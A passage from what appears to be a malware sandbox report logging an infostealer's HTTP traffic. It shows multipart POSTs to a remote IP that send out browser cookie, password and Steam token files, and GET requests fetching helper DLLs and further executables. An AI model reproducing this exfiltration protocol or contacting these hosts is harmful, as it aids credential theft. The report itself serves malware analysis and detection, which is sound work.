name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="mode"1------AEGHJKJKKJDHIDHJKJDB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="mode"2------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="mode"21------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHHost: 147.45.68.138Content-Length: 8173Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="file_name"Q29va2ll
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_data"------HJKKFIJKFCAKJJJKJKFI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_data"------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 147.45.68.138Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="mode"3------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 2d 2d 0d 0a Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="mode"4------AKEGDAKEHJDHIDHJJDAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 147.45.68.138Content-Length: 457Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 2b 64 41 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 2d 2d 0d 0a Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="file_data"N+dA------JDBFIIEBGCAKKEBFBAAF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 147.45.68.138Content-Length: 98233Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 2d 2d 0d 0a Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="mode"5------BFBGDGIDBAAEBFHJKJDG--
Source: global traffic	HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGHDBAFIJJJJKJDHDHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 32 33 35 38 38 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="mode"51------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="task_id"1023588------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="status"1------BFIDGHDBAFIJJJJKJDHD--
Source: global traffic	HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
